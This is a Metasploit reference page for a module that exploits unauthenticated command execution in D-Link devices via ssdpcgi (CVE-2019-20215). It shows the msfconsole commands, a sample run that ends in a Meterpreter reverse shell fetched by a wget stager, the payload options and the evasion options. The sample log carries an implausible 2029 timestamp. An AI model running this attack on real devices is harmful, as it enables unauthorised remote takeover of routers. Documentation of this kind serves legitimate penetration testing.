D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi - Metasploit

This page contains detailed information about how to use the exploit/linux/upnp/dlink_dir859_exec_ssdpcgi metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi
Module: exploit/linux/upnp/dlink_dir859_exec_ssdpcgi
Source code: modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
Disclosure date: 2019-12-24
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): mipsbe
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): 1900
List of CVEs: CVE-2019-20215

D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.

Module Ranking and Traits

Module Ranking:

• excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage

msf > use exploit/linux/upnp/dlink_dir859_exec_ssdpcgi
msf exploit(dlink_dir859_exec_ssdpcgi) > exploit

Required Options

• RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

• RPORT: The target port

Knowledge Base

msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run 
[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://0.0.0.0:8080/38YWEX2
[*] Local IP: http://192.168.70.28:8080/38YWEX2
[*] Target Payload URN
[*] Client 192.168.0.1 (Wget) requested /38YWEX2
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
[*] Server stopped.
meterpreter > 

Go back to menu.

Msfconsole Usage

Here is how the linux/upnp/dlink_dir859_exec_ssdpcgi exploit module looks in the msfconsole:

msf6 > use exploit/linux/upnp/dlink_dir859_exec_ssdpcgi

[*] Using configured payload linux/mipsbe/meterpreter_reverse_tcp
msf6 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > show info

       Name: D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi
     Module: exploit/linux/upnp/dlink_dir859_exec_ssdpcgi
   Platform: Linux
       Arch: mipsbe
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-12-24

Provided by:
  s1kr10s
  secenv

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    1900             yes       The target port (TCP)
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
  VECTOR   URN              yes       Header through which to exploit the vulnerability (Accepted: URN, UUID)

Payload information:

Description:
  D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-20215
  https://medium.com/@s1kr10s/2e799acb8a73

Module Options

This is a complete list of options available in the linux/upnp/dlink_dir859_exec_ssdpcgi exploit:

msf6 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > show options

Module options (exploit/linux/upnp/dlink_dir859_exec_ssdpcgi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    1900             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VECTOR   URN              yes       Header through which to exploit the vulnerability (Accepted: URN, UUID)

Payload options (linux/mipsbe/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options

Here is a complete list of advanced options supported by the linux/upnp/dlink_dir859_exec_ssdpcgi exploit:

msf6 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > show advanced

Module advanced options (exploit/linux/upnp/dlink_dir859_exec_ssdpcgi):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CMDSTAGER::DECODER                       no        The decoder stub to use.
   CMDSTAGER::FLAVOR       wget             no        The CMD Stager to use. (Accepted: auto, echo, wget)
   CMDSTAGER::SSL          false            no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                          no        Writable directory for staged files
   CPORT                                    no        The local client port
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (linux/mipsbe/meterpreter_reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the linux/upnp/dlink_dir859_exec_ssdpcgi module can exploit:

msf6 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the linux/upnp/dlink_dir859_exec_ssdpcgi exploit:

msf6 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > show payloads

Compatible Payloads
===================

   #   Name                                            Disclosure Date  Rank    Check  Description
   -   ----                                            ---------------  ----    -----  -----------
   0   payload/generic/custom                                           normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                   normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/mipsbe/exec                                        normal  No     Linux Execute Command
   4   payload/linux/mipsbe/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   5   payload/linux/mipsbe/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   6   payload/linux/mipsbe/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   7   payload/linux/mipsbe/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   8   payload/linux/mipsbe/reboot                                      normal  No     Linux Reboot
   9   payload/linux/mipsbe/shell/reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   10  payload/linux/mipsbe/shell_bind_tcp                              normal  No     Linux Command Shell, Bind TCP Inline
   11  payload/linux/mipsbe/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options

Here is the full list of possible evasion options supported by the linux/upnp/dlink_dir859_exec_ssdpcgi exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > show evasion

Module evasion options:

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   HTTP::chunked         false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression     none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding  false            no        Enable folding of HTTP headers
   HTTP::junk_headers    false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache        false            no        Disallow the browser to cache HTTP content
   HTTP::server_name     Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size    0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay       0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Related Pull Requests

• #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
• #12887 Merged Pull Request: Cve 2019 20215

References

• CVE-2019-20215
• https://medium.com/@s1kr10s/2e799acb8a73

See Also

Check also the following modules related to this module:

• auxiliary/admin/upnp/soap_portmapping
• auxiliary/dos/upnp/miniupnpd_dos
• auxiliary/scanner/upnp/ssdp_amp
• auxiliary/scanner/upnp/ssdp_msearch
• exploit/linux/http/dlink_upnp_exec_noauth
• exploit/linux/http/realtek_miniigd_upnp_exec_noauth
• exploit/linux/upnp/belkin_wemo_upnp_exec
• exploit/linux/upnp/dlink_dir859_subscribe_exec
• exploit/linux/upnp/dlink_upnp_msearch_exec
• exploit/linux/upnp/miniupnpd_soap_bof
• exploit/multi/upnp/libupnp_ssdp_overflow
• exploit/osx/mdns/upnp_location
• exploit/linux/http/dlink_authentication_cgi_bof
• exploit/linux/http/dlink_command_php_exec_noauth
• exploit/linux/http/dlink_dcs_930l_authenticated_remote_command_execution
• exploit/linux/http/dlink_dcs931l_upload
• exploit/linux/http/dlink_diagnostic_exec_noauth
• exploit/linux/http/dlink_dir300_exec_telnet
• exploit/linux/http/dlink_dir605l_captcha_bof
• exploit/linux/http/dlink_dir615_up_exec
• exploit/linux/http/dlink_dir850l_unauth_exec
• exploit/linux/http/dlink_dsl2750b_exec_noauth
• exploit/linux/http/dlink_dspw110_cookie_noauth_exec
• exploit/linux/http/dlink_dspw215_info_cgi_bof
• exploit/linux/http/dlink_dwl_2600_command_injection
• exploit/linux/http/dlink_hedwig_cgi_bof
• exploit/linux/http/dlink_hnap_bof
• exploit/linux/http/dlink_hnap_header_exec_noauth
• exploit/linux/http/dlink_hnap_login_bof
• auxiliary/admin/http/dlink_dir_300_600_exec_noauth
• auxiliary/admin/http/dlink_dir_645_password_extractor
• auxiliary/admin/http/dlink_dsl320b_password_extractor
• auxiliary/admin/vxworks/dlink_i2eye_autoanswer
• auxiliary/scanner/http/dlink_dir_300_615_http_login
• auxiliary/scanner/http/dlink_dir_615h_http_login
• auxiliary/scanner/http/dlink_dir_session_cgi_http_login
• auxiliary/scanner/http/dlink_user_agent_backdoor
• auxiliary/sqli/dlink/dlink_central_wifimanager_sqli
• exploit/windows/http/dlink_central_wifimanager_rce
• exploit/windows/tftp/dlink_long_filename

Related Nessus plugins:

• D-Link DIR-300L/600L Remote Command Execution

Authors

• s1kr10s
• secenv

Version

This page has been produced using Metasploit Framework version 6.1.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.